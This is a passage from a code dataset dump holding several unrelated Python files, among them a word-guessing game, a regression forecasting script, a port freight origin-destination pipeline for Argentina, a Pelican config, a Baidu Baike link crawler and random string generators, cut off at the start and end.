while guess in guesses:\n print(\"You already guessed that letter. Try again.\")\n guess = input(\"\\nGuess a letter: \").upper()\n\n guesses += guess\n if guess in mystery:\n turns += 1 # a correct guess does not cost a turn; the decrement below cancels out\n\n print(display_word(mystery, guesses))\n turns -= 1\n print(\"\\n{} turns left.\".format(turns))\n\n if is_word_complete(mystery, guesses):\n print(\"\\nYou win!\")\n break\n elif turns == 0:\n print(\"\\n{} is the mystery word\".format(mystery))\n\n play_again = input(\"Play again? (Y or N): \").lower()\n if play_again == \"y\":\n list_of_words()\n\n
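# Build the string shown to the player: guessed letters revealed, everything else as underscores.\n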
def display_word(mystery, guesses):\n \"\"\" Displays a string of guesses and '_' depending on guesses\"\"\"\n user_guess = \"\"\n for char in mystery:\n if char in guesses:\n user_guess += char\n else:\n user_guess += \"_\"\n user_guess = \" \".join(user_guess)\n return user_guess.upper()\n\ndef is_word_complete(mystery, guesses):\n \"\"\"Checks to see if the word is complete\"\"\"\n missed = 0\n for char in mystery:\n if char not in guesses:\n missed += 1\n return missed == 0\n\ndef read_file(input_file):\n \"\"\"Reads input_file and returns words in a list\"\"\"\n with open(input_file) as file:\n lines = file.read().upper()\n lines = lines.split()\n return lines\n\ndef easy_words(my_list):\n \"\"\"Returns list of words that are 4 - 6 characters long\"\"\"\n easy_words_list = []\n for word in my_list:\n if len(word) >= 4 and len(word) <= 6:\n easy_words_list.append(word)\n return easy_words_list\n\ndef medium_words(my_list):\n \"\"\"Returns list of words that are 6 - 8 characters long\"\"\"\n medium_words_list = []\n for word in my_list:\n if len(word) >= 6 and len(word) <= 8:\n medium_words_list.append(word)\n return medium_words_list\n\ndef hard_words(my_list):\n \"\"\"Returns list of words that are 8 or more characters\"\"\"\n hard_words_list = []\n for word in my_list:\n if len(word) >= 8:\n hard_words_list.append(word)\n return hard_words_list\n\nif __name__ == \"__main__\":\n list_of_words()\n","sub_path":"mystery_word.py","file_name":"mystery_word.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"605653088","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 22 17:45:06 2019\n\n@author: simon\n\"\"\"\n\nimport numpy as np\nimport argparse\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \n\n\ndef read_data(fname,rho_ref,beta_ref):\n \"\"\"\n Reads the data from the input file\n Args:\n fname: name of the file containing the data, run build example to see the structure \n of the input_example.dat\n rho_ref: reference density\n beta_ref: reference inverse temperature (beta = 1/T - beta_ref)\n\n Returns:\n rho, beta, prope, sigma_prope shifted by the reference values\n \"\"\"\n data=np.loadtxt(fname)\n\n rho=data[:,0]-rho_ref\n temperature=data[:,1]\n prope=data[:,2]\n sigma_prope=data[:,3]\n beta=1/temperature-beta_ref\n\n return rho,beta, prope, sigma_prope\n\ninput_file=\"input_example.dat\"\nx,y, z, zerr=read_data(input_file,0,0)\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.scatter(x, y, z, zdir='z',marker='.',label=\"Simulation\",color='r')\nax.plot_wireframe(np.reshape(x,(30,30)),np.reshape(y,(30,30)),np.reshape(z,(30,30)),color='b',label=\"Fitting\")\nfig.legend()\nfig.savefig(\"3Dplot.pdf\")","sub_path":"Lammps/dev/Fitting/plot_example.py","file_name":"plot_example.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"460969429","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 30 15:14:17 2020\r\n\r\n@author: FlaviaCosta\r\n\"\"\"\r\n#%% Install library\r\n#pip install statsmodels\r\n#%% import library\r\nimport pandas as pd\r\nimport statsmodels.api as sm\r\nfrom statsmodels.formula.api import ols\r\n#%% import the Excel workbook\r\nbase_projecao = pd.read_excel('C:/Users/FlaviaCosta/Google Drive/Projeções/Projeções.xlsm'\r\n , index_col = 0, sheet_name = 'BASE MODELAGEM PHYTON')\r\n
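#%% NOTE: the model below is an OLS fit of LOG_GUV (the log of the target series) on month dummies plus partner indicators; forecasts are exponentiated back to levels\r\n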
#%% start date of the test window\r\ndatateste = '2020-04-01'\r\n#%%\r\nbase_projecao['Inicio_Teste'] = pd.to_datetime(datateste)\r\n#%% split into training and test sets\r\nbase_treino = base_projecao.query('Data < Inicio_Teste')\r\nbase_teste = base_projecao.query('Data >= Inicio_Teste')\r\n\r\n#%% define the model variables\r\nformula_text = (\"\"\"\r\n LOG_GUV ~ \r\n C(month)\r\n + ITUNES\r\n + VIVOBUNDLECOMBO\r\n + TIM\r\n + OIBUNDLELIVROSNARRADOS\r\n + CARTAODECREDITO\r\n + CLARO\r\n + GOOGLEPLAY\r\n + VIVO\r\n + NEXTEL\r\n + OI\r\n + ALGARBUNDLE\r\n + MOVISTARESPANHA\r\n + OIUPSTREAM\r\n + TIGOCOLOMBIA\r\n + OUTROS\r\n + Outlier\r\n\r\n \"\"\")\r\n#%% example of adding a variable as categorical\r\n#res = ols(formula='Lottery ~ Literacy + Wealth + C(Region)', data=df).fit()\r\n# this returns one coefficient per region\r\n#%% fit the model\r\nmodel = ols(formula = formula_text, data = base_treino).fit()\r\n#%% parameters\r\nprint(model.summary())\r\n#%% plots - convert to numpy arrays for plotting\r\nimport numpy as np\r\nYpred = np.array(np.exp(model.fittedvalues))\r\nYreal = np.array(np.exp(base_treino['LOG_GUV']))\r\n#%% plot\r\nimport matplotlib.pyplot as plt\r\nplt.plot(Ypred, color = 'red', label = 'Predicted')\r\nplt.plot(Yreal, color = 'blue', label = 'Actual')\r\nplt.legend()\r\nplt.title('Time series forecast')\r\n#%% prediction\r\nprediction = np.exp(model.predict(base_teste))\r\n#%% combine in-sample and out-of-sample predictions\r\npredictionTotal = np.append(Ypred, np.array(prediction))\r\n#%% export predictions\r\npd.DataFrame(predictionTotal).to_csv('C:/Users/FlaviaCosta/Google Drive/Projeções/projecao_faturamento.csv')\r\n\r\n#%% export coefficients\r\ncoeficientes = np.array(model.params)\r\npd.DataFrame(coeficientes).to_csv('C:/Users/FlaviaCosta/Google Drive/Projeções/coeficientes.csv')","sub_path":".ipynb_checkpoints/Projeção Phyton-checkpoint.py","file_name":"Projeção Phyton-checkpoint.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"274751442","text":"\"\"\"Create port network and OD data from Argentina\n\"\"\"\nimport csv\nimport os\nimport types\nimport fiona\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nimport unidecode\nfrom atra.utils import *\n\ndef extract_subset_from_dataframe(input_dataframe,skiprows,start_row,end_row,new_columns):\n output_data = []\n input_dataframe = input_dataframe.iloc[skiprows:]\n for iter_,row in input_dataframe.iterrows():\n output_data.append(tuple(row[start_row:end_row]))\n\n output_df = pd.DataFrame(output_data,columns=new_columns)\n return output_df\n\ndef get_province_matches(x,provinces_df):\n match = provinces_df[provinces_df['station'] == x]\n if len(match.index) > 0:\n match = match['province'].values.tolist()\n return match[0]\n else:\n return ''\n\ndef replace_string_characters(x,replace_strings):\n x_change = x.lower().strip()\n for rp in replace_strings:\n x_change = x_change.replace(rp[0],rp[1])\n\n return x_change\n\ndef assign_industry_names(x,industries_df):\n return industries_df.loc[(x.commodity_group,x.commodity_subgroup),'high_level_industry']\n\ndef set_reference_date(x,reference_date):\n if x == 0:\n x = pd.Timestamp(reference_date)\n\n return x\n\ndef port_name_to_node_matches(port_reference,named_port,commodity_group,country,port_nodes,port_renames,port_countries):\n if unidecode.unidecode(str(named_port).lower().strip()) in ('rada','rada exterior','transito'):\n named_port = 
'Unknown'\n\n port_match = [x for x in list(port_nodes.itertuples(index=False)) \\\n if (unidecode.unidecode(port_reference.lower().strip()) == unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(port_reference.lower().strip()) in unidecode.unidecode(x.name.lower().strip()))\n ]\n\n p_rename = [x.port for x in list(port_renames.itertuples(index=False)) \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(x.od_port.lower().strip()))\n and (unidecode.unidecode(commodity_group.lower().strip()) == unidecode.unidecode(x.commodity_group.lower().strip()))\n ]\n if not p_rename:\n p_rename = [x.port for x in list(port_renames.itertuples(index=False)) \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(x.od_port.lower().strip()))\n and (unidecode.unidecode(x.commodity_group.lower().strip()) in ('all','other'))\n ]\n if not p_rename:\n p_rename = [x.node for x in list(port_countries.itertuples(index=False)) \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(x.port_name.lower().strip()))\n ]\n if not p_rename:\n p_rename = [x.node for x in list(port_countries.itertuples(index=False)) \\\n if (unidecode.unidecode(str(country).lower().strip()) == unidecode.unidecode(str(x.country).lower().strip()))\n and (unidecode.unidecode(x.port_name.lower().strip()) in ('all','other'))\n ]\n if p_rename:\n named_port = p_rename[0]\n else:\n named_port = p_rename[0]\n\n else:\n named_port = p_rename[0]\n else:\n named_port = p_rename[0]\n\n\n st_match = [x for x in port_match \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(port_reference.lower().strip()))\n or (unidecode.unidecode(str(named_port).lower().strip()) in unidecode.unidecode(port_reference.lower().strip()))\n or (unidecode.unidecode(port_reference.lower().strip()) in unidecode.unidecode(str(named_port).lower().strip()))\n or (named_port == x.id)\n ]\n\n if not st_match:\n st_match = [x for x in list(port_nodes.itertuples(index=False)) \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(str(named_port).lower().strip()) in unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(x.name.lower().strip()) in unidecode.unidecode(str(named_port).lower().strip()))\n or (named_port == x.id)\n ]\n if not st_match:\n st_match = port_match\n\n return st_match\n\n\ndef main(config):\n \"\"\"\n \"\"\"\n incoming_data_path = config['paths']['incoming_data']\n data_path = config['paths']['data']\n\n '''Specify the min-max speeds in km/hr\n '''\n min_speed = 4.0\n max_speed = 5.0\n\n '''Specify the columns in the input excel data \n With their Spanish names and translated English names\n '''\n translate_columns = {\n 'Puerto':'port',\n 'mes':'month',\n 'Fecha Entrada':'entrance_date',\n 'Hora Entrada':'entrance_time',\n 'Fecha Salida':'exit_date',\n 'Hora Salida':'exit_time',\n 'País de Procedencia':'origin_country',\n 'Puerto de Procedencia':'origin_port',\n 'País de Destino':'destination_country',\n 'Puerto de Destino':'destination_port',\n 'Tipo de Operación':'operation_type',\n 'Producto Corregido':'commodity_subgroup',\n 'Rubro':'commodity_group',\n 'Total Tn':'tons',\n 'Medida':'unit'\n }\n '''Assumed start date by default, when no date is given\n '''\n ref_date = '2017-01-01 00:00:00'\n '''Specify the types of port operations, which will be used to infer OD flow direction\n If it is an export operation at a port, 
then the port is an origin\n If it is an import operation at a port, then the port is a destination\n Transit operations are later included within exports\n The names of the operations are dervied from the input data provided to us\n '''\n export_operations = ['Exportación','Vehículos Expo','Transbordo Expo','Cabotaje Salido']\n import_operations = ['Importación','Transbordo Impo','Vehículos Impo','Cabotaje Entrado']\n transit_operattions = ['Tránsito','Otros']\n\n '''Specify the input files for the port nodes, matches to rename ports and the OD data\n '''\n print ('* Reading input data')\n port_nodes = gpd.read_file(os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_network',\n 'water_nodes.shp'),encoding='utf-8').fillna('none')\n port_nodes.crs = {'init' :'epsg:4326'}\n port_names = port_nodes[['name','id','province']]\n\n\n port_renames = pd.read_excel(os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_od_cleaning',\n 'od_port_matches.xlsx'),\n sheet_name='matches',\n encoding='utf-8-sig')\n port_countries = pd.read_excel(os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_od_cleaning',\n 'od_port_matches.xlsx'),\n sheet_name='country_ports',\n encoding='utf-8-sig')\n\n port_df = pd.read_excel(os.path.join(incoming_data_path,\n 'OD_data',\n 'port',\n 'Cargas No Containerizadas - SSPVNYMM.xlsx'),\n sheet_name='2017',\n encoding='utf-8-sig').fillna(0)\n\n '''Get the high level industries and commodity matches\n '''\n industries_df = pd.read_excel(os.path.join(data_path,\n 'economic_IO_tables',\n 'input',\n 'commodity_classifications-hp.xlsx'),\n sheet_name='port',index_col=[0,1])\n industry_cols = list(set(industries_df['high_level_industry'].values.tolist()))\n\n '''Start the process of creating OD flows\n '''\n print ('* Cleaning data and creating OD matrix')\n port_df.columns = port_df.columns.str.strip()\n port_df.rename(columns=translate_columns,inplace=True)\n port_df = port_df[port_df['tons'] > 0]\n od_ports = []\n od_matrix = []\n for p in list(port_df.itertuples(index=False)):\n port_id = [x.id for x in list(port_names.itertuples(index=False)) \\\n if (unidecode.unidecode(p.port.lower().strip()) == unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(p.port.lower().strip()) in unidecode.unidecode(x.name.lower().strip()))\n ][0]\n port_province = [x.province for x in list(port_names.itertuples(index=False)) \\\n if (unidecode.unidecode(p.port.lower().strip()) == unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(p.port.lower().strip()) in unidecode.unidecode(x.name.lower().strip()))\n ][0]\n if port_province.lower().strip() == 'ciudad bs as':\n port_province = 'Ciudad Autónoma de Buenos Aires'\n\n match = port_name_to_node_matches(p.port,p.origin_port,p.commodity_group,p.origin_country,port_names[['name','id']],port_renames,port_countries)\n o_id = [m.id for m in match][0]\n o_province = [x.province for x in list(port_names.itertuples(index=False)) \\\n if x.id == o_id\n ][0]\n if o_province == 'none':\n o_province = 'Rest of World'\n elif o_province.lower().strip() == 'ciudad bs as':\n o_province = 'Ciudad Autónoma de Buenos Aires'\n\n match = port_name_to_node_matches(p.port,p.destination_port,p.commodity_group,p.destination_country,port_names[['name','id']],port_renames,port_countries)\n d_id = [m.id for m in match][0]\n d_province = [x.province for x in list(port_names.itertuples(index=False)) \\\n if x.id == d_id\n ][0]\n if d_province == 
'none':\n d_province = 'Rest of World'\n elif d_province.lower().strip() == 'ciudad bs as':\n d_province = 'Ciudad Autónoma de Buenos Aires'\n\n od_ports.append((o_id,p.origin_port,p.origin_country,port_id,p.port,port_province,d_id, \\\n p.destination_port,p.destination_country,p.operation_type,p.commodity_group,p.commodity_subgroup,p.entrance_date,p.entrance_time,p.exit_date,p.exit_time,p.tons,p.unit))\n\n if p.operation_type in export_operations:\n operation = 'Export'\n elif p.operation_type in import_operations:\n operation = 'Import'\n else:\n operation = 'Transit'\n\n if p.unit.lower().strip() == 'unidades':\n tons = 15*p.tons\n else:\n tons = p.tons\n\n if len(set([o_id,port_id,d_id])) == 1:\n if operation in ['Export','Transit']:\n od_matrix.append((port_id,port_province,'watern_90','Rest of World',operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n else:\n od_matrix.append(('watern_90','Rest of World',port_id,port_province,operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n\n elif len(set([o_id,port_id,d_id])) == 2:\n if o_id != port_id:\n d_id = o_id\n d_province = o_province\n if operation in ['Export','Transit']:\n origin_id = port_id\n origin_province = port_province\n destination_id = d_id\n destination_province = d_province\n else:\n origin_id = d_id\n origin_province = d_province\n destination_id = port_id\n destination_province = port_province\n\n od_matrix.append((origin_id,origin_province,destination_id,destination_province,operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n else:\n od_matrix.append((o_id,o_province,port_id,port_province,operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n od_matrix.append((port_id,port_province,d_id,d_province,operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n\n \n od_dfs = pd.DataFrame(od_ports,columns=['origin_id','origin_port','origin_country',\n 'intermediate_id','intermediate_port','intermediate_province',\n 'destination_id','destination_port','destination_country',\n 'operation_type','commodity_group','commodity_subgroup',\n 'entrance_date','entrance_time','exit_date','exit_time','tons','unit'])\n od_dfs['industry_name'] = od_dfs.apply(lambda x:assign_industry_names(x,industries_df),axis=1)\n od_dfs.to_csv(os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_od_cleaning',\n 'od_flows_raw.csv'),encoding='utf-8-sig',index=False)\n\n '''Match industries\n '''\n od_dfs = pd.DataFrame(od_matrix,columns=['origin_id','origin_province',\n 'destination_id','destination_province',\n 'operation_type','commodity_group','commodity_subgroup',\n 'entrance_date','exit_date','tons'])\n od_dfs['entrance_date'] = od_dfs['entrance_date'].apply(lambda x:set_reference_date(x,ref_date))\n od_dfs['o_date'] = od_dfs['entrance_date'].dt.date\n od_dfs['industry_name'] = od_dfs.apply(lambda x:assign_industry_names(x,industries_df),axis=1)\n\n od_vals_group_industry = {}\n\n gr_cols = ['origin_id','destination_id',\n 'origin_province','destination_province',\n 'commodity_group','commodity_subgroup','industry_name','o_date']\n od_com_day_totals = od_dfs[gr_cols+['tons']].groupby(gr_cols)['tons'].sum().reset_index()\n od_dfs[['o_date','tons']].groupby('o_date')['tons'].sum().reset_index().to_csv(os.path.join(incoming_data_path,'port_ods','od_daily_total.csv'),encoding='utf-8-sig',index=False)\n\n gr_cols = 
['origin_id','destination_id',\n 'origin_province','destination_province',\n 'commodity_group','commodity_subgroup','industry_name']\n od_com_max = od_com_day_totals[gr_cols + ['tons']].groupby(gr_cols).max().rename(columns={'tons': 'max_daily_tons'}).reset_index()\n od_com_min = od_com_day_totals[gr_cols + ['tons']].groupby(gr_cols).min().rename(columns={'tons': 'min_daily_tons'}).reset_index()\n od_minmax = pd.merge(od_com_min,od_com_max,how='left',on=gr_cols).fillna(0)\n\n for iter_,row in od_minmax.iterrows():\n if '{}-{}'.format(row.origin_id,row.destination_id) not in od_vals_group_industry.keys():\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)] = {}\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['origin_province'] = row.origin_province\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['destination_province'] = row.destination_province\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_total_tons'] = row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_total_tons'] = row.max_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_{}'.format(row.industry_name)] = row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_{}'.format(row.industry_name)] = row.max_daily_tons\n else:\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_total_tons'] += row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_total_tons'] += row.max_daily_tons\n\n if 'min_{}'.format(row.industry_name) not in od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)].keys():\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_{}'.format(row.industry_name)] = row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_{}'.format(row.industry_name)] = row.max_daily_tons\n else:\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_{}'.format(row.industry_name)] += row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_{}'.format(row.industry_name)] += row.max_daily_tons\n\n\n od_list = []\n for key,values in od_vals_group_industry.items():\n od_list.append({**{'origin_id':key.split('-')[0],'destination_id':key.split('-')[1]},**values})\n od_df = pd.DataFrame(od_list).fillna(0)\n od_df.to_csv(os.path.join(data_path,'OD_data','port_nodes_daily_ods.csv'),index=False,encoding='utf-8-sig')\n\n del od_list\n\n od_vals_group_industry = {}\n for iter_,row in od_dfs.iterrows():\n if '{}-{}'.format(row.origin_id,row.destination_id) not in od_vals_group_industry.keys():\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)] = {}\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['origin_province'] = row.origin_province\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['destination_province'] = row.destination_province\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['total_tons'] = row.tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)][row.industry_name] = row.tons\n else:\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['total_tons'] += row.tons\n\n if row.industry_name not in 
od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)].keys():\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)][row.industry_name] = row.tons\n else:\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)][row.industry_name] += row.tons\n\n od_list = []\n for key,values in od_vals_group_industry.items():\n od_list.append({**{'origin_id':key.split('-')[0],'destination_id':key.split('-')[1]},**values})\n od_df = pd.DataFrame(od_list).fillna(0)\n del od_list\n\n province_ods = od_df[['origin_province','destination_province']+industry_cols + ['total_tons']]\n province_ods = province_ods.groupby(['origin_province','destination_province'])[industry_cols + ['total_tons']].sum().reset_index()\n province_ods.to_csv(os.path.join(data_path,'OD_data','port_province_annual_ods.csv'),index=False,encoding='utf-8-sig')\n\n '''Add properties to port edges\n '''\n print ('* Creating port network with parameters')\n port_edges_path = os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_network',\n 'water_edges.shp')\n port_edges = gpd.read_file(port_edges_path,encoding='utf-8').fillna(0)\n port_edges.columns = map(str.lower, port_edges.columns)\n port_edges.rename(columns={'id':'edge_id','from_id':'from_node','to_id':'to_node'},inplace=True)\n port_edges = port_edges[['from_node','to_node','edge_id','geometry']]\n # get the right linelength\n port_edges['length'] = port_edges.geometry.apply(line_length)\n port_edges['min_speed'] = 4.0\n port_edges['max_speed'] = 5.0\n port_edges['min_time'] = port_edges['length']/port_edges['max_speed']\n port_edges['max_time'] = port_edges['length']/port_edges['min_speed']\n\n cost_df = pd.read_excel(os.path.join(incoming_data_path,'costs','port','port_costs.xlsx'),sheet_name='costs')\n port_edges['min_gcost'] = cost_df['min_cost'].values[0]\n port_edges['max_gcost'] = cost_df['max_cost'].values[0]\n port_edges.crs = {'init' :'epsg:4326'}\n\n port_edges.to_file(os.path.join(data_path,'network','port_edges.shp'),encoding = 'utf-8')\n port_edges.drop('geometry', axis=1, inplace=True)\n port_edges.to_csv(os.path.join(data_path,'network','port_edges.csv'),encoding='utf-8-sig',index=False)\n\n port_nodes.rename(columns={'id':'node_id'},inplace=True)\n port_nodes.to_file(os.path.join(data_path,'network','port_nodes.shp'),encoding = 'utf-8')\n port_nodes.drop('geometry', axis=1, inplace=True)\n port_nodes.to_csv(os.path.join(data_path,'network','port_nodes.csv'),encoding='utf-8-sig',index=False)\n\nif __name__ == '__main__':\n CONFIG = load_config()\n main(CONFIG)\n","sub_path":"src/atra/preprocess/port_od_flows.py","file_name":"port_od_flows.py","file_ext":"py","file_size_in_byte":21359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"133279526","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\n# Development pelican configuration file\n\nAUTHOR = 'Pierre-Luc Perrier'\nSITENAME = 'Pluc'\nSITEURL = ''\nRELATIVE_URLS = True\nDEFAULT_LANG = 'fr'\nTIMEZONE = 'Europe/Paris'\nTHEME = 'abzhack'\n\nPATH = 'content'\nCACHE_CONTENT = False\nLOAD_CONTENT_CACHE = False\n\nSUMMARY_MAX_LENGTH = 20\nDISPLAY_PAGES_ON_MENU=True\n\n# Pagination\n## The minimum number of articles allowed on the last page\nDEFAULT_ORPHANS = 1\n## The maximum number of articles to include on a page, not including\n## orphans. 
False to disable pagination.\nDEFAULT_PAGINATION = False\n# A set of patterns that are used to determine advanced pagination output.\n# PAGINATION_PATTERNS = (\n# (1, '{base_name}/', '{base_name}/index.html'),\n# (2, '{base_name}/page/{number}/', '{base_name}/page/{number}/index.html'),\n# )\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Disable tag generation\nTAGS_SAVE_AS = ''\nTAG_SAVE_AS = ''\n\n# Blogroll\nLINKS = ()\n\n# Social widget\nSOCIAL = (\n ('github', 'https://github.com/kode9'),\n ('stackoverflow', 'https://stackoverflow.com/users/1024122/thepluc'),\n)\n\n# Theme specific\nUSER_LOGO_URL='images/pluc.png'\nAUTO_REFRESH = False\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"238703553","text":"# from bs4 import BeautifulSoup\n# from urllib.request import urlopen\n#\n# # html = urlopen(\"https://baike.baidu.com/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711?fr=aladdin&fromid=22046949&fromtitle=%E7%88%AC%E8%99%AB\").read().decode(\"utf-8\")\n# print(html)\n# soup = BeautifulSoup(html,\"lxml\")\n#\n# all_href = soup.find_all(\"div\")\n# # all_href = [l['href'] for l in all_href]\n# print('\\n', all_href)\n\n\n# from bs4 import BeautifulSoup\n# from urllib.request import urlopen\n#\n# # if has Chinese, apply decode()\n# html = urlopen(\"https://morvanzhou.github.io/static/scraping/list.html\").read().decode('utf-8')\n# print(html)\n# soup = BeautifulSoup(html,'lxml')\n# month = soup.find_all('class')\n# month = [1 ['month'] for 1 in month]\n# print(month)\n\n\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport re\nimport random\n\n\nbase_url = \"https://baike.baidu.com\"\nhis = [\"/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711\"]\n\nurl = base_url + his[-1]\n\nhtml = urlopen(url).read().decode('utf-8')\nsoup = BeautifulSoup(html, features='lxml')\nprint(soup.find('h1').get_text(), ' url: ', his[-1])\n\n# find valid urls\nsub_urls = soup.find_all(\"a\", {\"target\": \"_blank\", \"href\": re.compile(\"/item/(%.{2})+$\")})\n\nif len(sub_urls) != 0:\n his.append(random.sample(sub_urls, 1)[0]['href'])\nelse:\n # no valid sub link found\n his.pop()\nprint(his)\n\n","sub_path":"WebCrawlerTest/beautifulSoupTest.py","file_name":"beautifulSoupTest.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"114503938","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n#-------------------------------------------------------------------------------\n# Name: module2\n# Purpose:\n#\n# Author: Jean\n#\n# Created: 04/03/2018\n# Copyright: (c) Jean 2018\n# Licence: \n#-------------------------------------------------------------------------------\n#!/usr/bin/python\ndef random1():\n import random\n lower_a = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n upper_a = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n num = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n all = []\n all = \" \".join(\"\".join(lower_a) + \"\".join(upper_a) + \"\".join(num))\n all = all.split()\n x = 1\n c = 1\n while x < 10:\n y 
= []\n        for i in range(c):\n            a = random.choice(all)\n            y.append(a)\n        print (\"\".join(y))\n        x += 1\n        c += 1\n\ndef random2():\n    import itertools\n\n    lower_a = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n    upper_a = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n    num = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n    all = []\n    all = lower_a + upper_a + num\n\n    for r in range(1, 3):\n        for s in itertools.product(all, repeat=r):\n            print (''.join(s))\n\ndef random3():\n    lower_a = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n    upper_a = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n    num = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n    all = []\n    all = lower_a + upper_a + num\n\n    def recursive_product(myList, length, myString = \"\"):\n        if length == 0:\n            print (myString)\n            return\n        for c in myList:\n            recursive_product(myList, length-1, myString + c)\n\n    for r in range(1, 3):\n        recursive_product(all, r)\n\ndef random4():\n    from itertools import combinations\n\n    # adjacent string literals only concatenate inside a single expression, so parenthesize them\n    symbols = (\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n               \"abcdefghijklmnopqrstuvwxyz\"\n               \"0123456789\")\n    